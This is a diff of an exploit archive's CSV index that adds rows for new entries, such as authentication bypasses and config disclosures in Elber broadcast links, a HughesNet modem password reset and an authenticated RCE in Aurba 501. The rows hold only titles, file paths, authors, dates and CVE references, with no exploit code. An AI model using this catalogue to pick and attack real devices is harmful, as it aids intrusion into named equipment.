 52007,exploits/hardware/webapps/52007.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
 52002,exploits/hardware/webapps/52002.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
 52003,exploits/hardware/webapps/52003.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
+52071,exploits/hardware/webapps/52071.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
+52072,exploits/hardware/webapps/52072.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
 51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
 51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
 51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@@ -4516,6 +4520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,webapps,hardware,,2009-12-02,,1,OSVDB-60666;CVE-2009-4197;OSVDB-60646;OSVDB-60645;OSVDB-60644;OSVDB-60643;OSVDB-60642;OSVDB-60641;OSVDB-60640;OSVDB-60639;CVE-2009-4196,,,,,
 43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215,2018-01-01,2018-01-01,0,CVE-2017-17215,,,,,https://pastebin.com/4nzunPB5
 45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,,2018-12-14,2018-12-14,0,CVE-2015-7254,,,,,
+52073,exploits/hardware/webapps/52073.py,"HughesNet HT2000W Satellite Modem - Password Reset",2024-08-24,"Simon Greenblatt",webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
 42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,webapps,hardware,,2017-06-30,2017-06-30,0,,,,,,
 42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,webapps,hardware,,2017-09-15,2017-10-03,0,CVE-2017-11435,,,,,
 39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,webapps,hardware,80,2016-06-15,2016-06-15,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
@@ -8917,6 +8922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,,2018-12-03,2018-12-05,0,CVE-2018-8021,,,,http://www.exploit-db.comincubator-superset-0.22.0.tar.gz,
 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,,2020-01-10,2020-01-10,0,,,,,,
 20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,webapps,linux,,2012-07-23,2012-07-23,1,OSVDB-84397,,,,,
+52074,exploits/linux/webapps/52074.py,"Aurba 501 - Authenticated RCE",2024-08-24,"Hosein Vita",webapps,linux,,2024-08-24,2024-08-24,0,,,,,,
 21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,webapps,linux,,2012-10-10,2012-10-10,1,OSVDB-85554,"Metasploit Framework (MSF)",,,,
 40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80,2016-07-29,2016-07-29,0,CVE-2015-8257,,,,,http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,,2019-07-22,2019-07-22,0,,,,,,